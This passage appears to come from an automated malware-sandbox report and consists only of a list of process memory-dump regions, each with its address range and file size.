                                                                                                                                              • memory/900-160-0x0000000002760000-0x0000000002761000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-152-0x00000000027B0000-0x00000000027B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-174-0x00000000025C0000-0x00000000025C1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-164-0x0000000002960000-0x0000000002961000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-148-0x0000000002640000-0x0000000002641000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-150-0x00000000027B0000-0x00000000027B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-172-0x00000000025C0000-0x00000000025C1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-155-0x0000000002600000-0x0000000002601000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-168-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/900-170-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1180-327-0x000007FEF6590000-0x000007FEF6599000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/1180-219-0x00000000025C0000-0x00000000025C1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1312-308-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1312-304-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1312-306-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1312-310-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1312-300-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1312-302-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1312-298-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1312-309-0x0000000000400000-0x000000000045D000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                372KB

                                                                                                                                              • memory/1516-234-0x000000013F440000-0x000000013F450000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/1640-339-0x0000000000400000-0x00000000008A6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/1640-924-0x0000000000400000-0x00000000008A6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/1640-340-0x0000000002840000-0x0000000002CE6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/1680-383-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/1680-193-0x0000000002310000-0x0000000002588000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.5MB

                                                                                                                                              • memory/1680-374-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/1680-372-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/1680-370-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/1680-261-0x0000000000400000-0x0000000000AAD000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.7MB

                                                                                                                                              • memory/1824-401-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                184KB

                                                                                                                                              • memory/1856-348-0x0000000000400000-0x0000000000443000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                268KB

                                                                                                                                              • memory/1928-82-0x0000000000D40000-0x0000000000D4E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                56KB

                                                                                                                                              • memory/1988-363-0x0000000001100000-0x000000000111E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                120KB

                                                                                                                                              • memory/2052-361-0x00000000002E0000-0x00000000002F2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/2068-140-0x0000000010000000-0x000000001002B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                172KB

                                                                                                                                              • memory/2132-226-0x00000000002D0000-0x00000000002DA000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/2176-128-0x00000000002F0000-0x0000000000314000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                144KB

                                                                                                                                              • memory/2176-334-0x0000000001D30000-0x0000000001D3A000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/2184-955-0x0000000000EF0000-0x0000000000F14000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                144KB

                                                                                                                                              • memory/2192-41-0x0000000000EA0000-0x0000000000EAA000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                40KB

                                                                                                                                              • memory/2312-421-0x0000000000B90000-0x0000000000BE2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                328KB

                                                                                                                                              • memory/2312-428-0x0000000000280000-0x0000000000294000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                80KB

                                                                                                                                              • memory/2312-950-0x00000000002E0000-0x00000000002E8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/2312-967-0x0000000000610000-0x0000000000618000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/2472-342-0x0000000000400000-0x00000000008A6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/2472-926-0x0000000000400000-0x00000000008A6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/2536-70-0x0000000000400000-0x0000000000418000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/2536-39-0x0000000000400000-0x0000000000418000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/2600-496-0x0000000000350000-0x00000000003F2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                648KB

                                                                                                                                              • memory/2656-6839-0x0000000000800000-0x000000000085E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                376KB

                                                                                                                                              • memory/2672-2107-0x0000000000400000-0x0000000000659000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.3MB

                                                                                                                                              • memory/2672-764-0x0000000000400000-0x0000000000659000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.3MB

                                                                                                                                              • memory/2688-286-0x0000000002300000-0x000000000256B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.4MB

                                                                                                                                              • memory/2772-757-0x000000000C340000-0x000000000C599000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.3MB

                                                                                                                                              • memory/2772-37-0x00000000003E0000-0x00000000003F8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/2772-266-0x00000000003E0000-0x00000000003F8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/2772-328-0x000000000ACA0000-0x000000000B146000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/2772-329-0x000000000ACA0000-0x000000000B146000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/2772-265-0x00000000003E0000-0x00000000003F8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/2772-402-0x000000000BCC0000-0x000000000BD26000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                408KB

                                                                                                                                              • memory/2772-38-0x00000000003E0000-0x00000000003F8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/2772-793-0x000000000ACA0000-0x000000000AD67000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                796KB

                                                                                                                                              • memory/2772-341-0x000000000ACA0000-0x000000000AD67000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                796KB

                                                                                                                                              • memory/2772-1176-0x000000000ACA0000-0x000000000B146000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.6MB

                                                                                                                                              • memory/2772-1181-0x000000000BCC0000-0x000000000BD26000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                408KB

                                                                                                                                              • memory/2772-761-0x000000000C340000-0x000000000C599000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.3MB

                                                                                                                                              • memory/2800-4078-0x0000000000150000-0x00000000001AE000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                376KB

                                                                                                                                              • memory/2804-264-0x0000000002710000-0x000000000297B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.4MB

                                                                                                                                              • memory/2856-1466-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                184KB

                                                                                                                                              • memory/2856-71-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                184KB

                                                                                                                                              • memory/2900-1125-0x0000000001140000-0x0000000001156000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                88KB

                                                                                                                                              • memory/2920-120-0x0000000000AC0000-0x0000000000AEA000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                168KB

                                                                                                                                              • memory/2956-418-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                408KB

                                                                                                                                              • memory/2956-1007-0x0000000006630000-0x0000000006731000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/2956-5067-0x0000000006630000-0x0000000006731000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/2956-1008-0x0000000006630000-0x0000000006731000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/3196-6384-0x0000000001130000-0x000000000116E000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                248KB

                                                                                                                                              • memory/3288-5068-0x0000000000400000-0x0000000000501000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/3288-1009-0x0000000000400000-0x0000000000501000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.0MB

                                                                                                                                              • memory/3368-1199-0x0000000000F20000-0x0000000000F28000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/3668-4466-0x0000000006840000-0x0000000006CF3000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/3764-6489-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/3764-6483-0x000000001B6A0000-0x000000001B982000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.9MB

                                                                                                                                              • memory/3904-965-0x0000000001160000-0x00000000011E0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                512KB

                                                                                                                                              • memory/4168-6675-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                44KB

                                                                                                                                              • memory/4168-6057-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                44KB

                                                                                                                                              • memory/4168-1488-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                44KB

                                                                                                                                              • memory/4452-1520-0x0000000000980000-0x0000000001294000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                9.1MB

                                                                                                                                              • memory/5040-6724-0x0000000001140000-0x00000000015F7000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5040-6383-0x0000000001140000-0x00000000015F7000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5308-4477-0x0000000000980000-0x0000000000E33000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5308-5056-0x0000000000980000-0x0000000000E33000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5656-3886-0x0000000000BC0000-0x0000000000BC8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                32KB

                                                                                                                                              • memory/5800-6695-0x0000000007040000-0x00000000074F7000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5800-6694-0x0000000007040000-0x00000000074F7000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5800-6380-0x0000000007040000-0x00000000074F7000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5800-6376-0x0000000007040000-0x00000000074F7000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5800-5089-0x0000000000810000-0x0000000000CC3000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5800-6189-0x0000000000810000-0x0000000000CC3000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4.7MB

                                                                                                                                              • memory/5904-6655-0x0000000000230000-0x000000000026C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6193-0x0000000000230000-0x000000000026C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6656-0x0000000000230000-0x000000000026C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6659-0x0000000000230000-0x000000000026C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6654-0x0000000000400000-0x000000000043C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6192-0x0000000000230000-0x000000000026C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6191-0x0000000000230000-0x000000000026C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/5904-6190-0x0000000000400000-0x000000000043C000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                240KB

                                                                                                                                              • memory/6524-6371-0x0000000000F60000-0x0000000001022000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                776KB

                                                                                                                                              • memory/6524-6410-0x00000000009C0000-0x00000000009D8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                96KB

                                                                                                                                              • memory/7076-6454-0x0000000000400000-0x0000000000CF2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8.9MB

                                                                                                                                              • memory/7076-6381-0x0000000000400000-0x0000000000CF2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8.9MB

                                                                                                                                              • memory/7076-6065-0x0000000000400000-0x0000000000CF2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8.9MB

                                                                                                                                              • memory/7076-6063-0x0000000000400000-0x0000000000CF2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8.9MB

                                                                                                                                              • memory/7076-6058-0x0000000000400000-0x0000000000CF2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8.9MB

                                                                                                                                              • memory/7128-6395-0x0000000001170000-0x00000000011C6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                344KB

                                                                                                                                              • memory/7232-6488-0x0000000000D90000-0x0000000000DA2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/7248-6657-0x0000000000400000-0x000000000040B000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                44KB

                                                                                                                                              • memory/7352-6075-0x00000000008F0000-0x0000000000986000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                600KB

                                                                                                                                              • memory/7428-6091-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                584KB

                                                                                                                                              • memory/7444-6658-0x0000000000400000-0x0000000000405000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                20KB

                                                                                                                                              • memory/7552-6137-0x00000000000D0000-0x00000000000E0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB